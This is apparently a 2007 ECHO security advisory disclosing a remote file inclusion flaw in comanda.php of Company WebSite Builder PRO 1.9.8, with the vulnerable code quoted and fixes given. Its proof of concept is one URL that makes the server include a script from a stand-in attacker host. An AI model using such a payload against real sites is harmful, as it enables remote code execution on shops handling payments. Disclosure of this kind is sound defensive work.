Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability

____________________&nbsp;&nbsp;&nbsp;___&nbsp;___&nbsp;________ \\_&nbsp;&nbsp;&nbsp;_____/\\_&nbsp;&nbsp;&nbsp;___&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;\\_____&nbsp;&nbsp; &nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;__)_&nbsp;/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp;&nbsp;~&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp; &nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\\&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\\___&nbsp;&nbsp;&nbsp;&nbsp;Y&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; /_______&nbsp;&nbsp;/&nbsp;\\______&nbsp;&nbsp;/\\___|_&nbsp;&nbsp;/\\_______&nbsp;&nbsp;/ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.OR.ID ECHO_ADV_76$2007 -------------------------------------------------------------------------------------------- [ECHO_ADV_76$2007]&nbsp;Company&nbsp;WebSite&nbsp;Builder&nbsp;PRO&nbsp;(INCLUDE_PATH)&nbsp;Remote&nbsp;File&nbsp;Inclusion&nbsp;Vulnerability ---------------------------------------------&nbsp;---------------------------------------------- Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Dedi&nbsp;Dwianto&nbsp;a.k.a&nbsp;the_day Date&nbsp;Found&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;March,&nbsp;15th&nbsp;2007 Location&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Indonesia,&nbsp;Jakarta web&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://advisories.echo.or.id/adv/adv76-theday-2007.txt Critical&nbsp;Lvl&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Highly&nbsp;critical Impact&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;System&nbsp;access Where&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;From&nbsp;Remote --------------------------------------------------------------------------- Affected&nbsp;software&nbsp;description: ~~~~~~~~~~~~~~~~~~~~~~~ Application&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Company&nbsp;WebSite&nbsp;Builder&nbsp;PRO&nbsp;(&nbsp;CWB&nbsp;) version&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;1.9.8 URL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://www.grafxsoftware.com/ This&nbsp;software&nbsp;makes&nbsp;it&nbsp;easy&nbsp;to&nbsp;build&nbsp;an&nbsp;e-commerce&nbsp;site&nbsp;that&nbsp;processes&nbsp;credit&nbsp;cards, wire&nbsp;transfers.&nbsp;This&nbsp;is&nbsp;a&nbsp;great&nbsp;Content&nbsp;Management&nbsp;System&nbsp;that\'s&nbsp;easy&nbsp;to&nbsp;install&nbsp;and&nbsp;use&nbsp;WITHOUT&nbsp;having to&nbsp;FTP&nbsp;upload&nbsp;pages&nbsp;every&nbsp;time&nbsp;they&nbsp;need&nbsp;to&nbsp;be&nbsp;updated. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~ -&nbsp;Invalid&nbsp;include&nbsp;function&nbsp;at&nbsp;comanda.php -----------------------comanda.php------------ <? ... include($INCLUDE_LANGUAGE_PATH.\"$LANG.inc.php\"); include($INCLUDE_PATH.\"connection.php\"); include_once($INCLUDE_PATH.\"connection.php\"); include_once($INCLUDE_PATH.\"cls_produs.php\"); include_once($INCLUDE_PATH.\"cls_left_menu.php\"); include_once($INCLUDE_PATH.\"cls_stire.php\"); include_once($INCLUDE_PATH.\"cls_orders.php\"); include_once($INCLUDE_PATH.\"cls_headline_prod.php\"); include_once($INCLUDE_PATH.\"cls_checkout.php\"); include_once(\"cls_download_products.php\"); .... ?> ---------------------------------------------------------- Input&nbsp;passed&nbsp;to&nbsp;the&nbsp;\"$INCLUDE_PATH\"&nbsp;parameter&nbsp;in&nbsp;comanda.php&nbsp;is&nbsp;not properly&nbsp;verified&nbsp;before&nbsp;being&nbsp;used.&nbsp;This&nbsp;can&nbsp;be&nbsp;exploited&nbsp;to&nbsp;execute arbitrary&nbsp;PHP&nbsp;code&nbsp;by&nbsp;including&nbsp;files&nbsp;from&nbsp;local&nbsp;or&nbsp;external resources. Proof&nbsp;Of&nbsp;Concept: ~~~~~~~~~~ http://localhost/cwb/comanda.php?INCLUDE_PATH=http://atacker.com/inject.txt? Solution: ~~ -&nbsp;Sanitize&nbsp;variable&nbsp;$INCLUDE_PATH&nbsp;affected&nbsp;files. -&nbsp;Turn&nbsp;off&nbsp;register_globals --------------------------------------------------------------------------- Shoutz: ~ ~&nbsp;y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~&nbsp;Jessy&nbsp;Nice&nbsp;Girl ~&nbsp;az001,bomm_3x,matdhule ~&nbsp;newbie_hacker@yahoogroups.com ~&nbsp;#aikmel&nbsp;-&nbsp;#e-c-h-o&nbsp;@irc.dal.net ------------------------------------------------------------------------ --- Contact: ~ &nbsp;&nbsp;&nbsp;&nbsp;EcHo&nbsp;Research&nbsp;&&nbsp;Development&nbsp;Center &nbsp;&nbsp;&nbsp;&nbsp;http://advisories.echo.or.id &nbsp;&nbsp;&nbsp;&nbsp;erdc[at]echo[dot]or[dot]id &nbsp;&nbsp;&nbsp;&nbsp;the_day[at]echo[dot]or[dot]id &nbsp;